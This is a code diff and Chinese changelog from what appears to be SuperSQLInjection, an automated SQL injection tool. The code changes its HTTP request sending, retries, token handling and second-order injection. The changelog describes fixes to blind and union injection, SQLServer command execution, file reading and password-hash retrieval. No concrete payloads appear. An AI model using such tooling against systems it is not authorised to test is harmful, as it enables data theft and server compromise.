public const int WaitTime =5;
public const int WaitTime = 5;
public static Main main = null;
public static long index = 0;
public static String LastToken ="";
public const String Socks5ProxyType = "Socks5";
public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED";
@@ -50,6 +50,9 @@ namespace SuperSQLInjection.tools
public static void initMain(Main m)
{
main = m;
if(main.config.retryKey != null) {
RetryKeys=main.config.retryKey.Split(',');
};
}
/**
@@ -57,6 +60,19 @@ namespace SuperSQLInjection.tools
发生异常尝试重连
*
*/
public static String[] RetryKeys = null;
public static Boolean findRetryKey(String body) {
if (RetryKeys != null) {
foreach (String key in RetryKeys)
{
if (!String.IsNullOrEmpty(key)&&body.IndexOf(key) != -1)
{
return true;
}
}
}
return false;
}
public static ServerInfo sendRequestRetry(Boolean isSSL, int tryCount, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet)
{
if (request.IndexOf("<Token>") != -1) {
@@ -66,6 +82,7 @@ namespace SuperSQLInjection.tools
{
ServerInfo tserver = HTTP.sendRequestRetryNoToken(isSSL, tryCount, host, port, "获取Token", main.config.token_request, timeout, encoding, foward_302, redirectDoGet);
token = Tools.substr(tserver.body, main.config.token_startStr, main.config.token_endStr);
}
request = Regex.Replace(request, "(\\<Token\\>[.\\s\\S]*?\\<\\/Token\\>)", token);
}
@@ -87,6 +104,10 @@ namespace SuperSQLInjection.tools
{
continue;
}
else if (findRetryKey(server.body))
{
continue;
}
if (!String.IsNullOrEmpty(main.config.sencondRequest) && main.config.sencondInject)
{
server = sendHTTPRequest(count, host, port, "请求二次注入页面", main.config.sencondRequest, timeout, encoding, foward_302, redirectDoGet);
@@ -105,6 +126,10 @@ namespace SuperSQLInjection.tools
{
continue;
}
else if (findRetryKey(server.body))
{
continue;
}
if (!String.IsNullOrEmpty(main.config.sencondRequest)&& main.config.sencondInject)
{
server = sendHTTPSRequest(count, host, port, "请求二次注入页面", main.config.sencondRequest, timeout, encoding, foward_302, redirectDoGet);
@@ -153,6 +178,10 @@ namespace SuperSQLInjection.tools
if (server.code == 0) {
continue;
}
else if (findRetryKey(server.body))
{
continue;
}
return server;
}
else
@@ -163,6 +192,10 @@ namespace SuperSQLInjection.tools
{
continue;
}
else if (findRetryKey(server.body))
{
continue;
}
return server;
}
@@ -197,6 +230,7 @@ namespace SuperSQLInjection.tools
if (server.reuqestHeader.IndexOf("Transfer-Encoding: chunked")!=-1) {
return;
}
server.reuqestBody = request.Substring(sindex + 4, request.Length - sindex - 4);
int contentLength = Encoding.UTF8.GetBytes(server.reuqestBody).Length;
String newContentLength = Content_Length_Str_M + contentLength;
@@ -306,7 +340,7 @@ namespace SuperSQLInjection.tools
if (port > 0 && port <= 65556)
{
request = request.Replace(Main.setInjectStr, payload);
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
//编码处理
server.request = request;
@@ -388,8 +422,9 @@ namespace SuperSQLInjection.tools
String[] reqs = Regex.Split(request, "\r\n\r\n");
server.reuqestHeader = reqs[0];
server.reuqestBody = reqs[1];
clientSocket.Client.Send(Encoding.UTF8.GetBytes(server.reuqestHeader + "\r\n\r\n"));
clientSocket.Client.Send(Encoding.UTF8.GetBytes(server.reuqestBody));
//clientSocket.Client.Send(Encoding.UTF8.GetBytes(server.reuqestHeader));
//clientSocket.Client.Send(Encoding.UTF8.GetBytes("\r\n\r\n"+server.reuqestBody));
clientSocket.Client.Send(Encoding.UTF8.GetBytes(request));
}
else
{
@@ -451,11 +486,15 @@ namespace SuperSQLInjection.tools
return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet);
}
}
//超时
if (server.code >501&&server.code <505)
{
throw new Exception("http访问异常-code:"+ server.code+"");
}
//根据请求头解析
if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
//根据请求头解析
if (server.headers.ContainsKey(Content_Length)&& server.header.IndexOf(Content_Length_Zero) ==-1)
{
int length = int.Parse(server.headers[Content_Length]);
while (sum < length && sw.ElapsedMilliseconds <= timeout)
@@ -732,7 +771,7 @@ namespace SuperSQLInjection.tools
request = request.Replace(Main.setInjectStr, payload);
//编码处理
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
request = StringReplace.strReplaceCenter(main.config, request, main.replaceList,payload);
TimeOutSocket tos = new TimeOutSocket();
if (main.config.proxy_mode == 1 || main.config.proxy_mode == 2)
{
@@ -820,8 +859,9 @@ namespace SuperSQLInjection.tools
String[] reqs = Regex.Split(request, "\r\n\r\n");
server.reuqestHeader = reqs[0];
server.reuqestBody = reqs[1];
ssl.Write(Encoding.UTF8.GetBytes(server.reuqestHeader + "\r\n\r\n"));
ssl.Write(Encoding.UTF8.GetBytes(server.reuqestBody));
//ssl.Write(Encoding.UTF8.GetBytes(server.reuqestHeader + "\r\n\r\n"));
//ssl.Write(Encoding.UTF8.GetBytes(server.reuqestBody));
ssl.Write(Encoding.UTF8.GetBytes(request));
}
else {
ssl.Write(Encoding.UTF8.GetBytes(request));
@@ -888,7 +928,11 @@ namespace SuperSQLInjection.tools
}
//超时
if (server.code > 501 && server.code < 505)
{
throw new Exception("http访问异常-code:" + server.code + "");
}
//根据请求头解析
if (server.headers.ContainsKey(Content_Length) && server.header.IndexOf(Content_Length_Zero) == -1)

46
update.txt
View File

@@ -1,5 +1,47 @@
20190823 V1.0 正式版---
替换SQL语句count(*)为count(1),防止部分情况下*号被过滤,导致无法获取数据的问题
20191212 V1.0 正式版--
修复MYSQL部分情况下获取数据拆分字符混合导致数据显示错乱
增加发包失败的判断和关键词,识别到指定关键词时,认为此包无效,用于对付网络不稳定或数据库不稳定导致发包未正确获得数据时导致结果错误问题。
修复当SQLServer读写文件时选择了时间盲注时读写文件的exp构造错误导致无法读写文件。
20190905 V1.0 正式版--
修复部分情况下自动识别列数错误问题导致无法识别Union注入二分法算法缺陷导致
修复SQLServer延时注入执行命令和读取文件时无法获取结果的问题。
修复SQLServer错误注入无法显示数据问题。
20190903 V1.0 正式版--
修复代理导入崩溃问题。
20190902 V1.0 正式版--
修复批量扫描注入无法扫描jsp页面注入问题。
修复批量注入,无法停止爬行链接的问题。
修复批量注入少数情况由于Host后面跟了端口导致发包失败的问题。
修复批量注入由于之前配置文件变更导致无法加载盲注payload而无法扫描盲注问题。
20190901 V1.0 正式版--
修复代理导入默认IP都变为127.0.0.1的问题。
20190830 V1.0 正式版--
修复HTTP自动识别编码部分情况错误问题。
优化HTTP发包当状态码为0时重新尝试发包解决部分情况可能网络不稳定造成发包失败问题。
20190823 V1.0 正式版---
修复部分情况count(*)中*号被过滤导致无法获取数据的情况。
优化检查Union注入时order by判断降低错误判断列数的情况。
优化盲注二分法判断方式,提高效率。
20190813 V1.0 正式版---
修复发送数据超时时,按钮禁用未恢复。
修复更换文本显示框后由于换行符变更导致发包失败和无法自动检测注入的问题。
增加自动识别注入时,跳过配置文件设置的跳过参数。
20190812 V1.0 正式版---
修复上个版本代码变更导致sqlserver盲注获取不到数据的问题。
修改配置增加sqlserver获取主机IP和hash的语句。
20190811 V1.0 正式版---
修复mysql由于存在空值导致显示数据的列不对应的问题。
修复sqlserver部分情况下由于特殊字段类型导致报错无法获取数据的问题。
修复上个版本编码转换全选报错问题。
20190810 V1.0 正式版---
修复在Oracle注入下由于注入绕过的随机大小写和小写处理可能会将库名和表明处理导致无法获取表名或列名的情况。

BIN
新建 Microsoft Access Database.accdb
View File

Binary file not shown.